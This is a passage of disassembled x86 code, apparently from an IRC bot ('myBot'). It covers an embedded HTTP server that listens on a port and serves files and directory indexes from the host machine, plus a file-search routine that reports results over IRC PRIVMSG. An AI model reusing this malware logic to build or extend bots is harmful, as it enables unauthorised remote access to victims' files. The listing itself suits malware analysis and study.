loc_406CDD: ; CODE XREF: sub_406C9A+78�j
push esi
push 1
lea eax, [ebp+var_504]
push edi
push eax
call sub_419D90
add esp, 10h
lea eax, [ebp+var_504]
push 0
push edi
push eax
push dword_44B150
call ds:dword_4944C8 ; send
push 1
call ds:dword_4942D8
test byte ptr [esi+0Ch], 10h
jz short loc_406CDD
pop edi
loc_406D15: ; CODE XREF: sub_406C9A+3B�j
push esi
call sub_419740
pop ecx
push dword_44B150
call ds:dword_4944DC ; closesocket
call ds:dword_4944A8 ; WSACleanup
push 1
pop eax
loc_406D31: ; CODE XREF: sub_406C9A+35�j
pop esi
leave
retn
sub_406C9A endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_406D34 proc near ; DATA XREF: sub_402994+333�o
; sub_40C50A+54E6�o
var_28F0 = byte ptr -28F0h
var_18F0 = byte ptr -18F0h
var_8F0 = byte ptr -8F0h
var_6F0 = byte ptr -6F0h
var_5EC = dword ptr -5ECh
var_5E8 = byte ptr -5E8h
var_360 = byte ptr -360h
var_25C = dword ptr -25Ch
var_254 = dword ptr -254h
var_250 = dword ptr -250h
var_24C = dword ptr -24Ch
var_248 = dword ptr -248h
var_23C = byte ptr -23Ch
var_138 = dword ptr -138h
var_134 = dword ptr -134h
var_34 = byte ptr -34h
var_24 = word ptr -24h
var_22 = word ptr -22h
var_20 = dword ptr -20h
var_14 = dword ptr -14h
var_10 = dword ptr -10h
var_C = dword ptr -0Ch
var_8 = dword ptr -8
var_4 = dword ptr -4
arg_0 = dword ptr 8
push ebp
mov ebp, esp
mov eax, 28F0h
call sub_418D40
mov eax, [ebp+arg_0]
push ebx
push esi
push edi
mov ecx, 0ECh
mov esi, eax
lea edi, [ebp+var_5EC]
push 1
rep movsd
pop esi
xor ebx, ebx
mov [eax+3ACh], esi
push 10h
lea eax, [ebp+var_24]
push ebx
push eax
mov [ebp+var_14], esi
call sub_4189A0
add esp, 0Ch
mov [ebp+var_24], 2
push [ebp+var_25C]
call dword_44B6C0 ; htons
push ebx
push esi
push 2
mov [ebp+var_22], ax
mov [ebp+var_20], ebx
call dword_44B740 ; socket
mov edi, eax
cmp edi, 0FFFFFFFFh
mov [ebp+var_C], edi
jz loc_407125
mov eax, [ebp+var_254]
push 10h
imul eax, 234h
mov dword_44D064[eax], edi
lea eax, [ebp+var_24]
push eax
push edi
call dword_44B6EC ; bind
cmp eax, 0FFFFFFFFh
jz loc_407125
push 7FFFFFFFh
push edi
call dword_44B6E8 ; listen
cmp eax, 0FFFFFFFFh
jz loc_407125
lea eax, [ebp+var_14]
push eax
push 8004667Eh
push edi
call dword_44B75C ; ioctlsocket
cmp eax, 0FFFFFFFFh
jz loc_407125
mov ebx, esi
mov [ebp+var_134], edi
mov [ebp+var_138], ebx
mov [ebp+var_8], edi
loc_406E0B: ; CODE XREF: sub_406D34+3E7�j
push 41h
xor eax, eax
pop ecx
lea esi, [ebp+var_138]
push eax
push eax
push eax
lea eax, [ebp+var_6F0]
push eax
mov eax, [ebp+var_8]
lea edi, [ebp+var_6F0]
inc eax
rep movsd
push eax
call dword_44B6A8 ; select
cmp eax, 0FFFFFFFFh
jz loc_407120
xor esi, esi
mov [ebp+var_4], esi
loc_406E41: ; CODE XREF: sub_406D34+3E1�j
lea eax, [ebp+var_6F0]
push eax
push esi
call dword_44B5B8 ; __WSAFDIsSet
test eax, eax
jz loc_40710B
cmp esi, [ebp+var_C]
jnz short loc_406EC3
lea eax, [ebp+var_10]
mov [ebp+var_10], 10h
push eax
lea eax, [ebp+var_34]
push eax
push [ebp+var_C]
call dword_44B754 ; accept
cmp eax, 0FFFFFFFFh
jz loc_40710B
xor ecx, ecx
test ebx, ebx
jbe short loc_406E95
lea edx, [ebp+var_134]
loc_406E89: ; CODE XREF: sub_406D34+15F�j
cmp [edx], eax
jz short loc_406E95
inc ecx
add edx, 4
cmp ecx, ebx
jb short loc_406E89
loc_406E95: ; CODE XREF: sub_406D34+14D�j
; sub_406D34+157�j
cmp ecx, ebx
jnz short loc_406EB2
cmp ebx, 40h
jnb short loc_406EB2
mov [ebp+ecx*4+var_134], eax
mov ebx, [ebp+var_138]
inc ebx
mov [ebp+var_138], ebx
loc_406EB2: ; CODE XREF: sub_406D34+163�j
; sub_406D34+168�j
cmp eax, [ebp+var_8]
jbe loc_40710B
mov [ebp+var_8], eax
jmp loc_40710B
; ---------------------------------------------------------------------------
loc_406EC3: ; CODE XREF: sub_406D34+126�j
mov edi, 1000h
lea eax, [ebp+var_28F0]
push edi
push 0
push eax
call sub_4189A0
push edi
lea eax, [ebp+var_18F0]
push 0
push eax
call sub_4189A0
add esp, 18h
lea eax, [ebp+var_28F0]
push 0
push edi
push eax
push esi
call dword_44B6D8 ; recv
test eax, eax
jg short loc_406F56
push esi
call dword_44B758 ; closesocket
xor ecx, ecx
test ebx, ebx
jbe loc_40710B
lea eax, [ebp+var_134]
loc_406F15: ; CODE XREF: sub_406D34+1EB�j
cmp [eax], esi
jz short loc_406F26
inc ecx
add eax, 4
cmp ecx, ebx
jb short loc_406F15
jmp loc_40710B
; ---------------------------------------------------------------------------
loc_406F26: ; CODE XREF: sub_406D34+1E3�j
lea eax, [ebx-1]
cmp ecx, eax
jnb short loc_406F4A
lea eax, [ebp+ecx*4+var_134]
loc_406F34: ; CODE XREF: sub_406D34+214�j
mov edx, [eax+4]
inc ecx
mov [eax], edx
mov ebx, [ebp+var_138]
add eax, 4
lea edx, [ebx-1]
cmp ecx, edx
jb short loc_406F34
loc_406F4A: ; CODE XREF: sub_406D34+1F7�j
dec ebx
mov [ebp+var_138], ebx
jmp loc_40710B
; ---------------------------------------------------------------------------
loc_406F56: ; CODE XREF: sub_406D34+1C8�j
xor esi, esi
push 104h
lea eax, [ebp+var_23C]
push esi
push eax
call sub_4189A0
lea eax, [ebp+var_28F0]
mov [ebp+arg_0], esi
push eax
call sub_418E70
add esp, 10h
test eax, eax
jbe loc_40710B
loc_406F84: ; CODE XREF: sub_406D34+30F�j
mov eax, [ebp+arg_0]
mov al, [ebp+eax+var_28F0]
cmp al, 0Ah
mov [ebp+esi+var_18F0], al
jnz loc_40702F
lea eax, [ebp+var_18F0]
push offset aGet ; "GET "
push eax
call sub_419AB0
pop ecx
test eax, eax
pop ecx
jz short loc_407003
lea eax, [ebp+var_18F0]
push eax
call sub_418E70
cmp eax, 5
pop ecx
jbe short loc_407003
push offset asc_438880 ; " "
push offset asc_438884 ; " "
lea eax, [ebp+var_18F0]
push offset aGet_0 ; "GET "
push eax
call sub_419AB0
pop ecx
pop ecx
push eax
call sub_419AB0
pop ecx
pop ecx
push eax
call sub_419890
push eax
lea eax, [ebp+var_23C]
push eax
call sub_419FA0
add esp, 10h
jmp short loc_40701A
; ---------------------------------------------------------------------------
loc_407003: ; CODE XREF: sub_406D34+27E�j
; sub_406D34+290�j
lea eax, [ebp+var_18F0]
push offset asc_438890 ; "\r\n"
push eax
call sub_419360
pop ecx
test eax, eax
pop ecx
jz short loc_40704E
loc_40701A: ; CODE XREF: sub_406D34+2CD�j
push edi
lea eax, [ebp+var_18F0]
push 0
push eax
call sub_4189A0
add esp, 0Ch
or esi, 0FFFFFFFFh
loc_40702F: ; CODE XREF: sub_406D34+263�j
inc [ebp+arg_0]
lea eax, [ebp+var_28F0]
push eax
inc esi
call sub_418E70
cmp [ebp+arg_0], eax
pop ecx
jb loc_406F84
jmp loc_40710B
; ---------------------------------------------------------------------------
loc_40704E: ; CODE XREF: sub_406D34+2E4�j
xor ecx, ecx
test ebx, ebx
jbe short loc_407098
lea eax, [ebp+var_134]
loc_40705A: ; CODE XREF: sub_406D34+333�j
mov esi, [ebp+var_4]
cmp [eax], esi
jz short loc_40706B
inc ecx
add eax, 4
cmp ecx, ebx
jb short loc_40705A
jmp short loc_40709B
; ---------------------------------------------------------------------------
loc_40706B: ; CODE XREF: sub_406D34+32B�j
lea eax, [ebx-1]
cmp ecx, eax
jnb short loc_40708F
lea eax, [ebp+ecx*4+var_134]
loc_407079: ; CODE XREF: sub_406D34+359�j
mov edx, [eax+4]
loc_40707C: ; DATA XREF: .data:00435518�o
; .data:0043552C�o ...
inc ecx
mov [eax], edx
mov ebx, [ebp+var_138]
add eax, 4
lea edx, [ebx-1]
cmp ecx, edx
jb short loc_407079
loc_40708F: ; CODE XREF: sub_406D34+33C�j
dec ebx
mov [ebp+var_138], ebx
jmp short loc_40709B
; ---------------------------------------------------------------------------
loc_407098: ; CODE XREF: sub_406D34+31E�j
mov esi, [ebp+var_4]
loc_40709B: ; CODE XREF: sub_406D34+335�j
; sub_406D34+362�j
lea eax, [ebp+var_23C]
test eax, eax
jz short loc_407104
lea eax, [ebp+var_360]
push eax
call sub_418E70
mov edi, eax
lea eax, [ebp+var_23C]
push eax
call sub_418E70
add edi, eax
pop ecx
cmp edi, 104h
pop ecx
jnb short loc_407104
and [ebp+arg_0], 0
lea eax, [ebp+arg_0]
push eax
push 8004667Eh
push esi
call dword_44B75C ; ioctlsocket
push [ebp+var_254]
lea eax, [ebp+var_23C]
push [ebp+var_248]
push eax
lea eax, [ebp+var_360]
push eax
push esi
call sub_407317
add esp, 14h
jmp short loc_40710B
; ---------------------------------------------------------------------------
loc_407104: ; CODE XREF: sub_406D34+36F�j
; sub_406D34+395�j
push esi
call dword_44B758 ; closesocket
loc_40710B: ; CODE XREF: sub_406D34+11D�j
; sub_406D34+143�j ...
mov esi, [ebp+var_4]
inc esi
cmp esi, [ebp+var_8]
mov [ebp+var_4], esi
jbe loc_406E41
jmp loc_406E0B
; ---------------------------------------------------------------------------
loc_407120: ; CODE XREF: sub_406D34+102�j
mov edi, [ebp+var_C]
xor ebx, ebx
loc_407125: ; CODE XREF: sub_406D34+6A�j
; sub_406D34+92�j ...
call dword_44B654 ; WSAGetLastError
push eax
lea eax, [ebp+var_8F0]
push offset aHttpdErrorServ ; "[HTTPD]: Error: server failed, returned"...
push eax
call sub_418D70
add esp, 0Ch
cmp [ebp+var_24C], ebx
jnz short loc_40716B
push ebx
lea eax, [ebp+var_8F0]
push [ebp+var_250]
push eax
lea eax, [ebp+var_5E8]
push eax
push [ebp+var_5EC]
call sub_40842D
add esp, 14h
loc_40716B: ; CODE XREF: sub_406D34+412�j
lea eax, [ebp+var_8F0]
push eax
call sub_4035E1
pop ecx
push edi
call dword_44B758 ; closesocket
push [ebp+var_254]
call sub_416507
pop ecx
push ebx
call ds:dword_4942FC
pop edi
pop esi
pop ebx
sub_406D34 endp ; sp-analysis failed
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_407195 proc near ; DATA XREF: sub_407317+246�o
var_1654 = byte ptr -1654h
var_654 = byte ptr -654h
var_550 = byte ptr -550h
var_44C = dword ptr -44Ch
var_3C8 = byte ptr -3C8h
var_2C4 = byte ptr -2C4h
var_B8 = dword ptr -0B8h
var_B4 = dword ptr -0B4h
var_A4 = dword ptr -0A4h
var_9C = byte ptr -9Ch
var_68 = byte ptr -68h
var_20 = byte ptr -20h
arg_0 = dword ptr 8
push ebp
mov ebp, esp
mov eax, 1654h
call sub_418D40
mov eax, [ebp+arg_0]
push esi
push edi
mov ecx, 0ECh
mov esi, eax
lea edi, [ebp+var_44C]
rep movsd
mov dword ptr [eax+3ACh], 1
lea eax, [ebp+var_3C8]
push eax
lea eax, [ebp+var_550]
push eax
call sub_418D70
lea eax, [ebp+var_2C4]
push eax
lea eax, [ebp+var_654]
push eax
call sub_418D70
xor edi, edi
add esp, 10h
cmp [ebp+var_A4], edi
jz short loc_4071FA
push offset aTextHtml ; "text/html"
jmp short loc_4071FF
; ---------------------------------------------------------------------------
loc_4071FA: ; CODE XREF: sub_407195+5C�j
push offset aApplicationOct ; "application/octet-stream"
loc_4071FF: ; CODE XREF: sub_407195+63�j
lea eax, [ebp+var_9C]
push eax
call sub_418D70
pop ecx
lea eax, [ebp+var_68]
pop ecx
mov esi, 409h
push 46h
push eax
push offset aDddDdMmmYyyy ; "ddd, dd MMM yyyy"
push edi
push edi
push esi
call ds:dword_494378
lea eax, [ebp+var_20]
push 1Eh
push eax
push offset aHhMmSs ; "HH:mm:ss"
push edi
push edi
push esi
call ds:dword_494374
lea eax, [ebp+var_20]
cmp [ebp+var_B8], 0FFFFFFFFh
push eax
lea eax, [ebp+var_68]
push eax
lea eax, [ebp+var_20]
push eax
lea eax, [ebp+var_68]
push eax
lea eax, [ebp+var_20]
push eax
lea eax, [ebp+var_68]
push eax
jnz short loc_407278
lea eax, [ebp+var_9C]
push eax
lea eax, [ebp+var_1654]
push offset aHttp1_0200OkSe ; "HTTP/1.0 200 OK\r\nServer: myBot\r\nCache-C"...
push eax
call sub_418D70
add esp, 24h
jmp short loc_407299
; ---------------------------------------------------------------------------
loc_407278: ; CODE XREF: sub_407195+C4�j
push [ebp+var_B8]
lea eax, [ebp+var_9C]
push eax
lea eax, [ebp+var_1654]
push offset aHttp1_0200Ok_0 ; "HTTP/1.0 200 OK\r\nServer: myBot\r\nCache-C"...
push eax
call sub_418D70
add esp, 28h
loc_407299: ; CODE XREF: sub_407195+E1�j
lea eax, [ebp+var_1654]
push edi
push eax
call sub_418E70
pop ecx
push eax
lea eax, [ebp+var_1654]
push eax
push [ebp+var_44C]
call dword_44B710 ; send
cmp [ebp+var_A4], edi
jnz short loc_4072D9
lea eax, [ebp+var_550]
push eax
push [ebp+var_44C]
call sub_407C49
pop ecx
pop ecx
jmp short loc_4072F6
; ---------------------------------------------------------------------------
loc_4072D9: ; CODE XREF: sub_407195+12C�j
lea eax, [ebp+var_654]
push eax
push edi
push [ebp+var_44C]
lea eax, [ebp+var_550]
push eax
call sub_4075C7
add esp, 10h
loc_4072F6: ; CODE XREF: sub_407195+142�j
push [ebp+var_44C]
call dword_44B758 ; closesocket
push [ebp+var_B4]
call sub_416507
pop ecx
push edi
call ds:dword_4942FC
pop edi
pop esi
sub_407195 endp ; sp-analysis failed
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_407317 proc near ; CODE XREF: sub_406D34+3C6�p
var_8C4 = byte ptr -8C4h
var_6C4 = dword ptr -6C4h
var_640 = byte ptr -640h
var_53C = byte ptr -53Ch
var_330 = dword ptr -330h
var_32C = dword ptr -32Ch
var_31C = dword ptr -31Ch
var_318 = dword ptr -318h
var_314 = byte ptr -314h
var_211 = byte ptr -211h
var_210 = byte ptr -210h
var_10C = byte ptr -10Ch
var_10B = byte ptr -10Bh
var_10A = byte ptr -10Ah
var_8 = byte ptr -8
var_4 = dword ptr -4
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
arg_8 = dword ptr 10h
arg_C = dword ptr 14h
arg_10 = dword ptr 18h
push ebp
mov ebp, esp
sub esp, 8C4h
push ebx
push esi
push edi
xor edi, edi
push 104h
lea eax, [ebp+var_210]
push edi
push eax
mov [ebp+var_4], edi
call sub_4189A0
mov eax, [ebp+arg_8]
add esp, 0Ch
cmp byte ptr [eax], 2Fh
jz short loc_40734D
push eax
push offset aS_3 ; "\\%s"
jmp short loc_407356
; ---------------------------------------------------------------------------
loc_40734D: ; CODE XREF: sub_407317+2C�j
push eax
mov byte ptr [eax], 5Ch
push offset aS_4 ; "%s"
loc_407356: ; CODE XREF: sub_407317+34�j
lea eax, [ebp+var_10C]
push eax
call sub_418D70
add esp, 0Ch
lea eax, [ebp+var_10C]
xor esi, esi
xor ebx, ebx
push eax
call sub_418E70
test eax, eax
pop ecx
jbe short loc_4073F1
mov [ebp+arg_8], 2
loc_407381: ; CODE XREF: sub_407317+D8�j
lea eax, [ebp+var_10C]
push eax
call sub_418E70
cmp [ebp+arg_8], eax
pop ecx
jnb short loc_4073C1
cmp [ebp+esi+var_10C], 25h
jnz short loc_4073C1
cmp [ebp+esi+var_10B], 32h
jnz short loc_4073C1
cmp [ebp+esi+var_10A], 30h
jnz short loc_4073C1
inc esi
mov [ebp+ebx+var_210], 20h
inc esi
add [ebp+arg_8], 2
jmp short loc_4073DB
; ---------------------------------------------------------------------------
loc_4073C1: ; CODE XREF: sub_407317+7A�j
; sub_407317+84�j ...
mov al, [ebp+esi+var_10C]
cmp al, 2Fh
jnz short loc_4073D1
push 5Ch
pop eax
jmp short loc_4073D4
; ---------------------------------------------------------------------------
loc_4073D1: ; CODE XREF: sub_407317+B3�j
movsx eax, al
loc_4073D4: ; CODE XREF: sub_407317+B8�j
mov [ebp+ebx+var_210], al
loc_4073DB: ; CODE XREF: sub_407317+A8�j
lea eax, [ebp+var_10C]
inc esi
inc [ebp+arg_8]
push eax
inc ebx
call sub_418E70
cmp esi, eax
pop ecx
jb short loc_407381
loc_4073F1: ; CODE XREF: sub_407317+61�j
lea eax, [ebp+var_210]
push eax
lea eax, [ebp+var_314]
push [ebp+arg_4]
push offset aSS_4 ; "%s%s"
push eax
call sub_418D70
lea eax, [ebp+var_314]
push offset asc_438AE8 ; "\n"
push eax
call sub_419890
add esp, 18h
lea eax, [ebp+var_314]
push eax
call ds:dword_49437C
push 1
cmp eax, 10h
pop esi
jz short loc_40743F
cmp eax, 0FFFFFFFFh
jnz short loc_407442
push [ebp+arg_0]
jmp short loc_4074BE
; ---------------------------------------------------------------------------
loc_40743F: ; CODE XREF: sub_407317+11C�j
mov [ebp+var_4], esi
loc_407442: ; CODE XREF: sub_407317+121�j
cmp [ebp+ebx+var_211], 5Ch
jnz short loc_40744F
mov [ebp+var_4], esi
loc_40744F: ; CODE XREF: sub_407317+133�j
mov ebx, [ebp+arg_0]
cmp [ebp+var_4], edi
mov [ebp+var_6C4], ebx
mov [ebp+var_318], edi
jz short loc_4074C9
cmp [ebp+arg_C], edi
jz short loc_4074BD
lea eax, [ebp+var_314]
push offset asc_438AEC ; "*"
push eax
call sub_419FB0
lea eax, [ebp+var_314]
push eax
lea eax, [ebp+var_640]
push eax
call sub_418D70
lea eax, [ebp+var_210]
push eax
call sub_407D06
lea eax, [ebp+var_210]
push eax
lea eax, [ebp+var_53C]
push eax
call sub_418D70
add esp, 1Ch
or [ebp+var_330], 0FFFFFFFFh
mov [ebp+var_31C], esi
jmp short loc_407518
; ---------------------------------------------------------------------------
loc_4074BD: ; CODE XREF: sub_407317+14F�j
push ebx
loc_4074BE: ; CODE XREF: sub_407317+126�j
call dword_44B758 ; closesocket
jmp loc_4075C0
; ---------------------------------------------------------------------------
loc_4074C9: ; CODE XREF: sub_407317+14A�j
push edi
push edi
push 3
push edi
push esi
lea eax, [ebp+var_314]
push 80000000h
push eax
call ds:dword_4942EC
mov esi, eax
cmp esi, 0FFFFFFFFh
jz short loc_407518
lea eax, [ebp+var_314]
push eax
lea eax, [ebp+var_640]
push eax
call sub_418D70
pop ecx
mov [ebp+var_31C], edi
pop ecx
push edi
push esi
call ds:dword_49431C
push esi
mov [ebp+var_330], eax
call ds:dword_4942E0
loc_407518: ; CODE XREF: sub_407317+1A4�j
; sub_407317+1CF�j
mov esi, [ebp+arg_10]
lea eax, [ebp+var_8C4]
push esi
push offset aHttpdWorkerThr ; "[HTTPD]: Worker thread of server thread"...
push eax
call sub_418D70
push edi
lea eax, [ebp+var_8C4]
push 3
push eax
call sub_4161EB
mov [ebp+var_32C], eax
imul eax, 234h
add esp, 18h
mov dword_44D05C[eax], esi
lea eax, [ebp+var_8]
push eax
lea eax, [ebp+var_6C4]
push edi
push eax
push offset sub_407195
push edi
push edi
call ds:dword_4942F4
mov ecx, [ebp+var_32C]
imul ecx, 234h
cmp eax, edi
mov dword_44D06C[ecx], eax
jz short loc_407592
loc_407580: ; CODE XREF: sub_407317+279�j
cmp [ebp+var_318], edi
jnz short loc_4075C0
push 5
call ds:dword_4942D8
jmp short loc_407580
; ---------------------------------------------------------------------------
loc_407592: ; CODE XREF: sub_407317+267�j
push ebx
call dword_44B758 ; closesocket
call ds:dword_4942F0
push eax
lea eax, [ebp+var_8C4]
push offset aHttpdFailedT_0 ; "[HTTPD]: Failed to start worker thread,"...
push eax
call sub_418D70
lea eax, [ebp+var_8C4]
push eax
call sub_4035E1
add esp, 10h
loc_4075C0: ; CODE XREF: sub_407317+1AD�j
; sub_407317+26F�j
pop edi
pop esi
xor eax, eax
pop ebx
leave
retn
sub_407317 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_4075C7 proc near ; CODE XREF: sub_407195+159�p
; sub_40C50A+49E3�p
var_594 = byte ptr -594h
var_490 = byte ptr -490h
var_388 = dword ptr -388h
var_374 = byte ptr -374h
var_368 = dword ptr -368h
var_35C = byte ptr -35Ch
var_248 = byte ptr -248h
var_48 = byte ptr -48h
var_20 = byte ptr -20h
var_18 = word ptr -18h
var_16 = word ptr -16h
var_12 = word ptr -12h
var_10 = word ptr -10h
var_E = word ptr -0Eh
var_8 = dword ptr -8
var_4 = dword ptr -4
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
arg_8 = dword ptr 10h
arg_C = dword ptr 14h
push ebp
mov ebp, esp
sub esp, 594h
push ebx
push esi
push edi
xor ebx, ebx
push 104h
lea eax, [ebp+var_594]
push ebx
push eax
mov [ebp+var_4], ebx
mov [ebp+var_8], ebx
call sub_4189A0
mov edi, [ebp+arg_0]
push offset asc_438B58 ; "\n"
push edi
call sub_419890
add esp, 14h
cmp [ebp+arg_8], ebx
jz short loc_407626
push edi
mov esi, 200h
push [ebp+arg_8]
lea eax, [ebp+var_248]
push offset aPrivmsgSSearch ; "PRIVMSG %s :Searching for: %s\r\n"
push esi
push eax
call sub_418EF0
add esp, 14h
jmp loc_407723
; ---------------------------------------------------------------------------
loc_407626: ; CODE XREF: sub_4075C7+3A�j
cmp [ebp+arg_C], ebx
push edi
jz loc_407709
call sub_418E70
mov [eax+edi-1], bl
push edi
mov esi, 200h
push offset aHtmlHeadTitleI ; "<HTML>\r\n<HEAD>\r\n<TITLE>Index of %s</TIT"...
lea eax, [ebp+var_248]
push esi
push eax
call sub_418EF0
add esp, 14h
lea eax, [ebp+var_248]
push ebx
push eax
call sub_418E70
pop ecx
push eax
lea eax, [ebp+var_248]
push eax
push [ebp+arg_4]
call dword_44B710 ; send
push edi
push offset aH1IndexOfSH1Ta ; "<H1>Index of %s</H1>\r\n<TABLE BORDER=\"0\""...
lea eax, [ebp+var_248]
push esi
push eax
call sub_418EF0
add esp, 10h
lea eax, [ebp+var_248]
push ebx
push eax
call sub_418E70
pop ecx
push eax
lea eax, [ebp+var_248]
push eax
push [ebp+arg_4]
call dword_44B710 ; send
push edi
call sub_418E70
push 3Ch
push 96h
mov byte ptr [eax+edi], 2Ah
push 0E6h
push offset aTrTdWidthDCode ; "<TR>\r\n<TD WIDTH=\"%d\"><CODE>Name</CODE><"...
lea eax, [ebp+var_248]
push esi
push eax
call sub_418EF0
add esp, 1Ch
lea eax, [ebp+var_248]
push ebx
push eax
call sub_418E70
pop ecx
push eax
lea eax, [ebp+var_248]
push eax
push [ebp+arg_4]
call dword_44B710 ; send
push offset aTrTdColspan3Hr ; "<TR>\r\n<TD COLSPAN=\"3\"><HR></TD>\r\n</TR>\r"...
lea eax, [ebp+var_248]
push esi
push eax
call sub_418EF0
add esp, 0Ch
jmp short loc_407723
; ---------------------------------------------------------------------------
loc_407709: ; CODE XREF: sub_4075C7+63�j
mov esi, 200h
push offset aSearchingForS ; "Searching for: %s\r\n"
lea eax, [ebp+var_248]
push esi
push eax
call sub_418EF0
add esp, 10h
loc_407723: ; CODE XREF: sub_4075C7+5A�j
; sub_4075C7+140�j
lea eax, [ebp+var_248]
push ebx
push eax
call sub_418E70
pop ecx
push eax
lea eax, [ebp+var_248]
push eax
push [ebp+arg_4]
call dword_44B710 ; send
cmp [ebp+arg_C], ebx
jz short loc_4077BB
push [ebp+arg_C]
call sub_418E70
cmp eax, 2
pop ecx
jbe short loc_4077BB
push [ebp+arg_C]
call sub_418E70
sub eax, 3
pop ecx
jz short loc_40776F
loc_407763: ; CODE XREF: sub_4075C7+1A6�j
mov ecx, [ebp+arg_C]
cmp byte ptr [eax+ecx], 2Fh
jz short loc_40776F
dec eax
jnz short loc_407763
loc_40776F: ; CODE XREF: sub_4075C7+19A�j
; sub_4075C7+1A3�j
inc eax
push eax
lea eax, [ebp+var_594]
push [ebp+arg_C]
push eax
call sub_4191A0
lea eax, [ebp+var_594]
push eax
push offset aTrTdColspan3AH ; "<TR>\r\n<TD COLSPAN=\"3\"><A HREF=\"%s\"><COD"...
lea eax, [ebp+var_248]
push esi
push eax
call sub_418EF0
add esp, 1Ch
lea eax, [ebp+var_248]
push ebx
push eax
call sub_418E70
pop ecx
push eax
lea eax, [ebp+var_248]
push eax
push [ebp+arg_4]
call dword_44B710 ; send
loc_4077BB: ; CODE XREF: sub_4075C7+17E�j
; sub_4075C7+18C�j
lea eax, [ebp+var_388]
push eax
push edi
call ds:dword_49433C
lea ecx, [ebp+var_388]
mov [ebp+arg_0], eax
push ecx
push eax
call ds:dword_494338
test eax, eax
jz loc_407BAC
mov edi, 1FFh
loc_4077E7: ; CODE XREF: sub_4075C7+5DF�j
cmp [ebp+var_388], ebx
jz loc_407B94
lea eax, [ebp+var_35C]
push offset a__ ; ".."
push eax
call sub_419360
pop ecx
test eax, eax
pop ecx
jz loc_407B94
lea eax, [ebp+var_35C]
push offset a_ ; "."
push eax
call sub_419360
pop ecx
test eax, eax
pop ecx
jz loc_407B94
lea eax, [ebp+var_20]
push eax
lea eax, [ebp+var_374]
push eax
call ds:dword_494360
lea eax, [ebp+var_18]
push eax
lea eax, [ebp+var_20]
push eax
call ds:dword_49435C
mov ax, [ebp+var_10]
mov ecx, offset aPm ; "PM"
cmp ax, 0Ch
ja short loc_40785C
mov ecx, offset aAm ; "AM"
loc_40785C: ; CODE XREF: sub_4075C7+28E�j
cmp ax, 0Ch
movzx eax, ax
jbe short loc_407868
sub eax, 0Ch
loc_407868: ; CODE XREF: sub_4075C7+29C�j
push ecx
movzx ecx, [ebp+var_E]
push ecx
push eax
movzx eax, [ebp+var_18]
push eax
movzx eax, [ebp+var_12]
push eax
movzx eax, [ebp+var_16]
push eax
lea eax, [ebp+var_48]
push offset a2_2d2_2d4d2_2d ; "%2.2d/%2.2d/%4d %2.2d:%2.2d %s"
push eax
call sub_418D70
add esp, 20h
test byte ptr [ebp+var_388], 10h
jz loc_407A15
inc [ebp+var_8]
cmp [ebp+arg_8], ebx
jz short loc_4078E9
lea eax, [ebp+var_35C]
push eax
push offset aS_5 ; "<%s>"
lea eax, [ebp+var_490]
push 106h
push eax
call sub_418EF0
lea eax, [ebp+var_48]
push eax
lea eax, [ebp+var_490]
push eax
lea eax, [ebp+var_248]
push [ebp+arg_8]
push offset aPrivmsgS31s21s ; "PRIVMSG %s :%-31s %-21s\n"
push esi
push eax
call sub_418EF0
add esp, 28h
jmp loc_407B65
; ---------------------------------------------------------------------------
loc_4078E9: ; CODE XREF: sub_4075C7+2DB�j
cmp [ebp+arg_C], ebx
jz loc_4079D3
push 0E6h
push offset aTrTdWidthDAHre ; "<TR>\r\n<TD WIDTH=\"%d\"><A HREF=\""
lea eax, [ebp+var_248]
push edi
push eax
call sub_418EF0
add esp, 10h
lea eax, [ebp+var_248]
push ebx
push eax
call sub_418E70
pop ecx
push eax
lea eax, [ebp+var_248]
push eax
push [ebp+arg_4]
call dword_44B710 ; send
lea eax, [ebp+var_35C]
push eax
lea eax, [ebp+var_248]
push [ebp+arg_C]
push offset aSS_5 ; "%s%s/"
push edi
push eax
call sub_418EF0
add esp, 14h
lea eax, [ebp+var_248]
push ebx
push eax
call sub_418E70
pop ecx
push eax
lea eax, [ebp+var_248]
push eax
push [ebp+arg_4]
call dword_44B710 ; send
lea eax, [ebp+var_35C]
push eax
call sub_418E70
cmp eax, 1Eh
pop ecx
lea eax, [ebp+var_35C]
push eax
jbe short loc_407989
push offset aCode_29sGtCode ; "\"><CODE>%.29s>/</CODE></A>"
jmp short loc_40798E
; ---------------------------------------------------------------------------
loc_407989: ; CODE XREF: sub_4075C7+3B9�j
push offset aCodeSCodeA ; "\"><CODE>%s/</CODE></A>"
loc_40798E: ; CODE XREF: sub_4075C7+3C0�j
lea eax, [ebp+var_248]
push edi
push eax
call sub_418EF0
add esp, 10h
lea eax, [ebp+var_248]
push ebx
push eax
call sub_418E70
pop ecx
push eax
lea eax, [ebp+var_248]
push eax
push [ebp+arg_4]
call dword_44B710 ; send
lea eax, [ebp+var_48]
push 3Ch
push eax
push 96h
push offset aTdTdWidthDCode ; "</TD>\r\n<TD WIDTH=\"%d\"><CODE>%s</CODE></"...
push edi
jmp loc_407B56
; ---------------------------------------------------------------------------
loc_4079D3: ; CODE XREF: sub_4075C7+325�j
lea eax, [ebp+var_35C]
push eax
push offset aS_6 ; "<%s>"
lea eax, [ebp+var_490]
push 106h
push eax
call sub_418EF0
lea eax, [ebp+var_48]
push eax
lea eax, [ebp+var_490]
push eax
push offset a31s21s ; "%-31s %-21s\r\n"
loc_407A00: ; CODE XREF: sub_4075C7+476�j
lea eax, [ebp+var_248]
push esi
push eax
call sub_418EF0
add esp, 24h
jmp loc_407B65
; ---------------------------------------------------------------------------
loc_407A15: ; CODE XREF: sub_4075C7+2CF�j
inc [ebp+var_4]
cmp [ebp+arg_8], ebx
jz short loc_407A3F
push ebx
push [ebp+var_368]
call sub_4055AD
push eax
lea eax, [ebp+var_48]
push eax
lea eax, [ebp+var_35C]
push eax
push [ebp+arg_8]
push offset aPrivmsgS31s2_0 ; "PRIVMSG %s :%-31s %-21s (%s bytes)\n"
jmp short loc_407A00
; ---------------------------------------------------------------------------
loc_407A3F: ; CODE XREF: sub_4075C7+454�j
cmp [ebp+arg_C], ebx
jz loc_407B3F
push 0E6h
push offset aTrTdWidthDAH_0 ; "<TR>\r\n<TD WIDTH=\"%d\"><A HREF=\""
lea eax, [ebp+var_248]
push edi
push eax
call sub_418EF0
add esp, 10h
